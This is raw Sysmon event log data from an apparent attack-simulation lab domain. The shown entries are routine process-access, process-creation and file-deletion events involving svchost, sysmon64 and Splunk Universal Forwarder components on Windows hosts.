08:02:24.364{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809363Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:02:24.364{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809362Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:24.364{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809361Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:02:24.364{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809360Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:24.364{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809359Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:02:24.364{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809358Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:24.364{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809357Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:02:24.364{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809356Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:24.364{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F710-60EB-B979-00000000D001}2532C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809355Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:24.364{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F710-60EB-B979-00000000D001}2532C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809354Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:24.349{0C1E0330-F710-60EB-B979-00000000D001}2532C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000809353Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:24.302{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA3F9445D3F8F2B28083B558CC47728E,SHA256=DF555B5D16F71CE31B948BAC0C3D42681C3049976BC2B725693DCC2BED9930F3,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001052611Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:02:24.118{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D292E65A1CD06D22444638ABE71EA74E,SHA256=A5B59BA4CCB41F5A33219275BA7C7697C1460A18EF3C646C377F2CFDE068F48E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000809396Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:25.614{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F711-60EB-BB79-00000000D001}2548C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809395Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:02:25.614{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809394Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:25.614{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809393Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:02:25.614{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809392Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:25.614{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809391Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:02:25.614{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809390Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:25.614{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809389Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:02:25.614{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809388Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:25.614{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809387Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:02:25.614{0C1E0330-048F-60E8-0C00-00000000D001}7242616C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000809386Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:25.614{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F711-60EB-BB79-00000000D001}2548C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000809385Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:25.614{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F711-60EB-BB79-00000000D001}2548C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000809384Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:25.601{0C1E0330-F711-60EB-BB79-00000000D001}2548C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000809383Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:25.599{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=20CE7151493F53D5DB3B040B893706B1,SHA256=4CFBFE593CAB7E3FD63BDB5069C277236EEA2F04FBC42B66035455361BD45222,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000809382Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:25.599{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B284F49F0F4BCD2AAEDAB06B97DFE007,SHA256=9CE20EAF3654C916630E15E4B25D3791C2163F862974E9F73C2CBD9E9BD79D3C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809381Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:02:25.599{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program 